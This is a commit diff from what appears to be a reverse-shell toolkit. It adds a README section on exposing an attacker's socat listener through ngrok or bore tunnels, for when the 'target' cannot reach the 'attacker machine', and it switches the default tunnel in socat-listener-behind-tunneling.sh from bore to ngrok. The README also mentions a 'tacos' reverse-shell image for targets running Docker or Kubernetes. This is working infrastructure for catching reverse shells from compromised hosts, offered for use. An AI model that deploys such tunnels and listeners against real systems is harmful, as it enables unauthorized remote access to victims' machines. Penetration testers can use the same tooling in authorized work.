fix bore url and ngrok default

ariary · Sep 19, 2022 · 0562d3f · 0562d3f
1 parent f658d90
commit 0562d3f
Show file tree

Hide file tree

Showing 2 changed files with 22 additions and 14 deletions.
diff --git a/README.md b/README.md
@@ -41,6 +41,14 @@ tmux
 # 💥
 ```
 
+<details>
+<summary><h4>🎁 Bonus n°1: expose listener to the world wide web</h4></summary>
+Useful if target can't directly reach the attacker machine, but has internet access
+<br> On attacker machine, install <code>ngrok</code> or <code>bore</code> and launch your listener:
+<pre><code>
+./light-pty4all/socat-listener-behind-tunneling.sh --ngrok
+</code></pre>
+</details>
 
 ### With docker (recommended)
 
@@ -58,7 +66,7 @@ tacos.container [LISTENING_ADDR] [LISTENING_PORT] # [OPTIONAL_TACOS_ARS]
 > From a networking point of view, this is the same level of isolation as if the processes were running directly on the host and not in a container. However, in all other ways, such as storage, process namespace, and user namespace, the process is isolated from the host.
 
 <details>
-<summary><h4>🎁 Bonus: <code>tacos</code> reverse shell image</h4></summary>
+<summary><h4>🎁 Bonus n°2: <code>tacos</code> reverse shell image</h4></summary>
 Useful if target is running docker, kubernetes, etc ...
 <br> On attacker machine, launch your <code>tacos</code> listener as usual
 <br> On target:

diff --git a/light-pty4all/socat-listener-behind-tunneling.sh b/light-pty4all/socat-listener-behind-tunneling.sh
@@ -14,8 +14,8 @@ for i in "$@"; do
  WEBPORT="$2"
  shift;shift;
  ;;
- --ngrok)
- NGROK=true
+ --bore)
+ BORE=true
  shift;shift;
  ;;
  --windows|-w)
@@ -85,16 +85,7 @@ cp ${SCRIPT}.tpl ${SCRIPT}
 
 # Tunneling launching
 TUNNEL_ENDPOINT=""
-if [[ $NGROK ]]; then
- ## launch ngrok
- echo "[+] Launch bore tunneling"
- tmux split-window -v "ngrok tcp ${WEBPORT}"
- sleep 4 # wait for ngrok to start
- NGROK_ENDPOINT_TCP=$(curl --silent --show-error http:https://127.0.0.1:4040/api/tunnels | jq -r ".tunnels[0].public_url")
- # NGROK_ENDPOINT="http:$(echo $NGROK_ENDPOINT_TCP | cut -d ":" -f 2-3)"
- NGROK_ENDPOINT="$(echo $NGROK_ENDPOINT_TCP | cut -d ':' -f 2-3 | cut -d '/' -f 3-)"
- TUNNEL_ENDPOINT="${NGROK_ENDPOINT}"
-else 
+if [[ $BORE ]]; then
  ## launch bore
  TEAL='\033[1;36m'
  NC='\033[0m' # No Color
@@ -103,7 +94,16 @@ else
  printf "${TEAL}please enter bore.pub remote_port given? ${NC}"
  read BPORT
  BORE_ENDPOINT="bore.pub:${BPORT}"
- NGROK_ENDPOINT_TCP = "${BORE_ENDPOINT}"
+ TUNNEL_ENDPOINT="${BORE_ENDPOINT}"
+else
+ ## launch ngrok
+ echo "[+] Launch ngrok tunneling"
+ tmux split-window -v "ngrok tcp ${WEBPORT}"
+ sleep 4 # wait for ngrok to start
+ NGROK_ENDPOINT_TCP=$(curl --silent --show-error http:https://127.0.0.1:4040/api/tunnels | jq -r ".tunnels[0].public_url")
+ # NGROK_ENDPOINT="http:$(echo $NGROK_ENDPOINT_TCP | cut -d ":" -f 2-3)"
+ NGROK_ENDPOINT="$(echo $NGROK_ENDPOINT_TCP | cut -d ':' -f 2-3 | cut -d '/' -f 3-)"
+ TUNNEL_ENDPOINT="${NGROK_ENDPOINT}"
 fi
 
 #launch gitar